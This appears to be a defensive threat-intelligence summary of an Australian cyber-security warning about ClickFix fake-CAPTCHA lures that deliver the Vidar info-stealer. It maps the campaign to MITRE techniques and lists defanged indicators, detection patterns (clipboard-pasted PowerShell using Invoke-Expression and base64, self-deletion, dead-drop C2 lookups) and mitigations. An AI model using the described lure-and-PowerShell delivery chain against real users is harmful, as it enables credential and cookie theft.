Full Report
The Australian Cyber Security Center (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware. [...]
Analysis Summary
# Tool/Technique: ClickFix & Vidar Stealer
## Overview
ClickFix is a sophisticated social engineering technique designed to trick users into manually executing malicious payloads. In this specific campaign identified by the ACSC, ClickFix is utilized as a delivery mechanism for **Vidar Stealer**, a prominent Information Stealer (Infostealer) malware-as-a-service (MaaS). The attack leverages fake browser verification or CAPTCHA prompts to bypass automated security controls by involving manual user intervention.
## Technical Details
- **Type:** Malware family (Vidar) / Social Engineering Technique (ClickFix)
- **Platform:** Windows (Targeting browsers and system memory)
- **Capabilities:** Credential theft, data exfiltration, memory-only execution, C2 dead-drop resolution.
- **First Seen:** Vidar Stealer: Late 2018; ClickFix variants: Observed actively in 2024-2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- [T1189 - Drive-by Compromise] (Compromised WordPress sites)
- **[TA0002 - Execution]**
- [T1059.001 - Command and Scripting Interpreter: PowerShell]
- [T1204.002 - User Execution: Malicious File/Command] (ClickFix interaction)
- **[TA0005 - Defense Evasion]**
- [T1027 - Obfuscated Files or Information]
- [T1070.004 - Indicator Removal: File Deletion] (Self-deletion of executable)
- **[TA0011 - Command and Control]**
- [T1102.001 - Web Service: Dead Drop Resolver] (Telegram/Steam profiles)
- **[TA0009 - Collection]**
- [T1539 - Steal Web Session Cookie]
- [T1555 - Credentials from Password Stores]
## Functionality
### Core Capabilities
- **Information Theft:** Targets browser-stored passwords, cookies, autofill data, and cryptocurrency wallets.
- **System Reconnaissance:** Collects detailed system specifications and user profiles.
- **Payload Delivery:** Uses PowerShell via ClickFix to pull the secondary executable onto the host.
### Advanced Features
- **Anti-Forensics:** Vidar deletes its own executable upon execution, transitioning into system memory to evade disk-based detection.
- **Stealth C2 Resolution:** Utilizes "dead-drop" URLs hosted on legitimate platforms (Telegram, Steam, Mastodon) to retrieve the actual Command and Control server IP, making traffic look legitimate.
- **Multi-threaded Operations:** Modern variants use multi-threading to speed up data collection and exfiltration.
## Indicators of Compromise
*Note: Specific hashes were not detailed in the source text, but behavioral and network patterns are highlighted.*
- **File Hashes:** [Specific hashes available in the official ACSC security bulletin]
- **File Names:** Common themes include fake Windows fixes or security certificates.
- **Network Indicators (Defanged):**
- `t[.]me/` (Telegram bot channels used for C2 resolution)
- `steamcommunity[.]com/profiles/` (Used for dead-drop URLs)
- `wordpress-hosted-infrastructure[.]site` (Compromised WordPress redirectors)
- **Behavioral Indicators:**
- PowerShell execution following "Copy" commands from a browser.
- Unexpected process termination followed by self-deletion of the initial binary.
- Outbound connections to public social media platforms from non-browser processes.
## Associated Threat Actors
- **Vidar MaaS Operators:** Marketed as Malware-as-a-Service, used by various cybercriminal affiliates.
- **ClickFix Campaign Groups:** Various actors targeting Australian infrastructure and global users via TikTok and GitHub.
## Detection Methods
- **Signature-based detection:** Deploying AV signatures for known Vidar variants and PowerShell loaders.
- **Behavioral detection:**
- Monitoring for PowerShell commands containing `Invoke-Expression` (IEX) or base64 strings copied from clipboard.
- Detection of processes performing self-deletion shortly after instantiation.
- **Network Monitoring:** Identifying traffic to known dead-drop resolver patterns on Telegram or Steam.
## Mitigation Strategies
- **Technical Controls:**
- Restrict PowerShell execution policy (e.g., Constrained Language Mode).
- Implement Application Allow-listing to prevent unauthorized binaries from running.
- **Software Hardening:**
- For WordPress admins: Promptly update themes and plugins; remove unused add-ons to prevent site compromise.
- **User Education:** Teach users to recognize that legitimate CAPTCHAs or Cloudflare checks never require copying and pasting commands into a terminal/PowerShell.
## Related Tools/Techniques
- **Lumma Stealer:** Often uses similar ClickFix/Fake CAPTCHA delivery methods.
- **StealC:** A competing info-stealer often distributed via similar MaaS channels.
- **ClearFake:** A neighboring social engineering campaign that uses fake browser update prompts.